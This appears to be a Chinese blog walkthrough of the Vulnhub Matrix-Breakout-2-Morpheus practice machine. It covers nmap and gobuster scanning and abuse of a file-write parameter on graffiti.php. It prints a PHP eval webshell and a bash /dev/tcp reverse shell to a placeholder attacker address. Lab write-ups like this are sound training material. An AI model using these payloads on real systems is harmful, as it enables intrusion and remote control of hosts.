当前位置: 首页 > ai >正文

Vulnhub Matrix-Breakout-2-Morpheus靶机攻略

1.下载靶机

靶机下载地址:https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova

下载后使用VM打开,后续选择安装地址开启就算是下载好了

2.主机发现

查看网络适配器模式(NET模式),找到NET模式的网段(192.168.79.0),使用我们kali的nmap进行扫描。扫描出来的结果可能会有干扰我们要找到我们自己的靶机地址。192.168.79.141

nmap -O 192.168.79.1/24

3.端口扫描

知道了我们的靶机地址,查看它的开放端口虽然上一步给出了我们一部分的端口但是为了防止扫描的不全我们进行全端口扫描,以防遗漏。在此博主使用的御剑工具。

以下是我们扫描得出的端口,我们挨个访问查看一下信息。

4.目录扫描

上面访问的端口没有明确有效信息,尝试看一下robots敏感文件(没有信息),接下来就要使用工具kali的dirb或者7k(扫不全)进行扫描了,除了我们已经访问过的index和robots还有一个JavaScript以及其子目录没访问,我们可以看看。

dirb http://192.168.79.141

访问所有已知目录并没有任何有用信息,换个工具字典再进行扫描,可以发现多了一个graffiti.php文件目录,我们去访问一下这个(一个留言板)。

gobuster dir -u http://192.168.79.141/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php

5.查找攻击点

我们提交数据时会在上面显示,抓包看看里面什么个逻辑。

我们抓包可以看到我们上传的数据会传到一个叫做graffiti.txt的文件里面。因此我们尝试传入数据是否可控,更改两个值看看有没有效果。

将file后的文件改为一个别的文件名1.php往里面传入数字看看能不能传进去。放行后我们去访问1.php。可以发现是可控的参数,接下来我们构造一句话木马getshell。

抓包将下述一句话木马写到php文件中。然后访问shell.php使用工具连接,就可以得到www-data的权限了。然后进行提权操作。

<?php @eval($_POST[cmd]);?>			//cmd为连接密码

6.反弹shell

我们是有写文件的权限的,在网站路径下创建一个文件写入反弹shell的代码保存为999.sh,然后监听执行

bash -i >& /dev/tcp/攻击机IP/攻击机端口 0>&1
nc -lvvp 端口
bash 999.sh			//靶机终端执行

http://www.xdnf.cn/news/16080.html

相关文章:

  • 基于规则架构风格对业务的重构
  • 每日算法刷题Day52:7.24:leetcode 栈5道题,用时1h35min
  • RPG64.制作敌人攻击波数四:优化
  • 让复杂 AI 应用构建就像搭积木:Spring AI Alibaba Graph 使用指南与源码解读
  • 企业级数据分析创新实战:基于表格交互与智能分析的双引擎架构
  • es0102---语法格式、数据类型、整合springboot、创建库、创建映射、新增数据、自定义查询
  • 【Qt开发】信号与槽(一)
  • node.js中的fs与path模块
  • 主流摄像头协议及其开源情况,GB/T 28181协议介绍
  • 云原生MySQL Operator开发实战(一):Operator基础与CRD设计
  • [语言模型训练]基于 PyTorch 的双向 LSTM 文本分类器实现:基于旅店的评论分类语言模型
  • Java_多线程_生产者消费者模型_互斥锁,阻塞队列
  • Java与NLP实战:文本处理到情感分析全解析
  • Ethereum: 从 1e+21 到千枚以太币:解密 Geth 控制台的余额查询
  • 适配器模式——以springboot为例
  • 《云计算蓝皮书 2025 》发布:云计算加速成为智能时代核心引擎
  • MySQL--day13--视图存储过程与函数
  • 垃圾回收GC
  • 【AI News | 20250722】每日AI进展
  • Java应用程序内存占用分析
  • 什么是HTTP长连接、短连接?谁更能抗DoS攻击?
  • 【数据库】国产数据库的新机遇:电科金仓以融合技术同步全球竞争
  • Python进阶知识之pandas库
  • 图论的题目整合(Dijkstra)
  • 欧盟网络安全标准草案EN 18031详解
  • ESP32-S3学习笔记<5>:SPI的应用
  • Redis 的事务机制是怎样的?
  • freqtrade在docker运行一个dryrun实例
  • UI自动化测试实战
  • mysql什么时候用char,varchar,text,longtext